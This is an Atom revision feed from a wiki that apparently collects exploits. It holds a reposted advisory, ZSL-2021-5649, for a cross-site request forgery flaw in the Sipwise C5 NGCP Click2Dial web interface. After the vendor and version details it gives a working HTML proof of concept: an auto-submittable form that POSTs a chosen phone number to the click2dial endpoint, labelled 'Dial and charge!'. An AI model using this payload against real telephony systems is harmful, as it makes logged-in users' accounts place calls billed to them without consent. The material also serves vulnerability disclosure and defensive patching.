<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Sipwise_C5_NGCP_CSC_CSRF%E6%BC%8F%E6%B4%9E</id>
	<title>Sipwise C5 NGCP CSC CSRF漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Sipwise_C5_NGCP_CSC_CSRF%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Sipwise_C5_NGCP_CSC_CSRF%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-11T05:04:57Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Sipwise_C5_NGCP_CSC_CSRF%E6%BC%8F%E6%B4%9E&amp;diff=1885&amp;oldid=prev</id>
		<title>Pwnwiki: 建立內容為「==CSRF== &lt;pre&gt; # Exploit Title: Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF) # Date: 13.04.2021 # Exploit Author: LiquidWorm # Vendor Homepa…」的新頁面</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Sipwise_C5_NGCP_CSC_CSRF%E6%BC%8F%E6%B4%9E&amp;diff=1885&amp;oldid=prev"/>
		<updated>2021-04-24T01:33:58Z</updated>

		<summary type="html">&lt;p&gt;建立內容為「==CSRF== &amp;lt;pre&amp;gt; # Exploit Title: Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF) # Date: 13.04.2021 # Exploit Author: LiquidWorm # Vendor Homepa…」的新頁面&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==CSRF==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: Sipwise C5 NGCP CSC - Click2Dial Cross-Site Request Forgery (CSRF)&lt;br /&gt;
# Date: 13.04.2021&lt;br /&gt;
# Exploit Author: LiquidWorm&lt;br /&gt;
# Vendor Homepage: https://www.sipwise.com&lt;br /&gt;
&lt;br /&gt;
Sipwise C5 NGCP CSC CSRF Click2Dial Exploit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vendor: Sipwise GmbH&lt;br /&gt;
Product web page: https://www.sipwise.com&lt;br /&gt;
Affected version: &amp;lt;=CE_m39.3.1&lt;br /&gt;
                  NGCP www_admin version 3.6.7&lt;br /&gt;
&lt;br /&gt;
Summary: Sipwise C5 (also known as NGCP - the Next Generation Communication Platform)&lt;br /&gt;
is a SIP-based Open Source Class 5 VoIP soft-switch platform that allows you to provide&lt;br /&gt;
rich telephony services. It offers a wide range of features (e.g. call forwarding, voicemail,&lt;br /&gt;
conferencing etc.) that can be configured by end users in the self-care web interface.&lt;br /&gt;
For operators, it offers a web-based administrative panel that allows them to configure&lt;br /&gt;
subscribers, SIP peerings, billing profiles, and other entities. The administrative web&lt;br /&gt;
panel also shows the real-time statistics for the whole system. For tight integration&lt;br /&gt;
into existing infrastructures, Sipwise C5 provides a powerful REST API interface.&lt;br /&gt;
&lt;br /&gt;
Desc: The application interface allows users to perform certain actions via HTTP requests&lt;br /&gt;
without performing any validity checks to verify the requests. This can be exploited to&lt;br /&gt;
perform certain actions with administrative privileges if a logged-in user visits a malicious&lt;br /&gt;
web site.&lt;br /&gt;
&lt;br /&gt;
Tested on: Apache/2.2.22 (Debian)&lt;br /&gt;
           Apache/2.2.16 (Debian)&lt;br /&gt;
           nginx&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic&lt;br /&gt;
                            @zeroscience&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Advisory ID: ZSL-2021-5649&lt;br /&gt;
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5649.php&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
13.04.2021&lt;br /&gt;
&lt;br /&gt;
--&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;&lt;br /&gt;
    &amp;lt;form action=&amp;quot;https://10.0.1.7/call/click2dial&amp;quot; method=&amp;quot;POST&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;d&amp;quot; value=&amp;quot;%2B3897031337&amp;quot; /&amp;gt;&lt;br /&gt;
      &amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;Dial and charge!&amp;quot; /&amp;gt;&lt;br /&gt;
    &amp;lt;/form&amp;gt;&lt;br /&gt;
  &amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>